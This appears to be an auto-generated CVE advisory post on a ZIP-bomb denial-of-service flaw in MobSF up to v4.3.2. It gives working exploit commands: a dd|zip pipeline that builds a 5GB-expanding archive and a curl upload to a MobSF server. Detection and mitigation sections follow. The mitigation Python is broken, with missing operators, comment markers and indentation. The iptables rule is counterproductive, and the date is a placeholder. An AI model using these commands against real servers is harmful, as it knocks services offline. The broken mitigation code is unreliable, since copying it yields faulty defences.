Listen to this Post
How the CVE Works:
MobSF (Mobile Security Framework) versions <= v4.3.2 fail to validate the uncompressed size of uploaded ZIP files before extraction. Attackers exploit this by crafting a malicious ZIP bomb—a small compressed file that decompresses into an enormous payload (e.g., 5GB from a 15MB ZIP). When uploaded via MobSF’s static analysis feature, the server extracts the file, exhausting disk space and causing a denial-of-service (DoS). This disrupts MobSF and any co-hosted services due to storage depletion.
DailyCVE Form:
Platform: MobSF
Version: <= v4.3.2
Vulnerability: ZIP Bomb
Severity: Critical
Date: 2024-XX-XX
What Undercode Say:
Exploit:
1. Craft a ZIP bomb:
dd if=/dev/zero bs=1M count=5000 | zip -9 bomb.zip -
2. Upload via MobSF API:
curl -X POST -F "[email protected]" http://mobsf-server/upload
Detection:
- Monitor disk spikes during ZIP extraction:
watch -n 1 df -h
- Log analysis for oversized extractions:
grep "Extracting" /var/log/mobsf.log | awk '{if($5 > 100000000) print "ALERT"}'
Mitigation:
1. Patch MobSF to enforce size checks:
def validate_zip(file):
with zipfile.ZipFile(file) as z:
total_size = sum(f.file_size for f in z.infolist())
if total_size > 100 1024 1024: 100MB limit
raise ValueError("ZIP too large")
2. Server-level safeguards:
Set disk quotas sudo setquota -u mobsf 1G 2G /
3. Network filtering:
iptables -A INPUT -p tcp --dport 8000 -m quota --quota 500000 -j DROP
References:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
